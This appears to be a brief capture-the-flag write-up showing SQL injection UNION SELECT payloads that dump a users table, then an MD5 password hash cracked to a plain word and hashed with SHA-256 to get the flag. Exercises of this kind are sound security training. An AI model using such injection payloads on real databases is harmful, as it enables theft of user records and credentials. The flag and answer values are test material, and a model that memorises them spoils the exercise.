# Run the following:
1 UNION (SELECT town, countryCONCAT(user_id, first_name, last_name, town, country, planet, Commentaire, countersign) FROM users)
5 UNION (SELECT town, country FROM users WHERE user_id = 5)

# Formatted result is:
user_id: 5
last_name: Get 
first_name: The Flag
Commentaire: Decrypt this password -> then lower all the char. Sh256 on it and it's good !
countersign: 5ff9d0165b4f92b14994e5c685cdce28

# 5ff9d0165b4f92b14994e5c685cdce28 -> FortyTwo -> fortytwo -> 10A16D834F9B1E4068B25C4C46FE0284E99E44DCEAF08098FC83925BA6310FF5
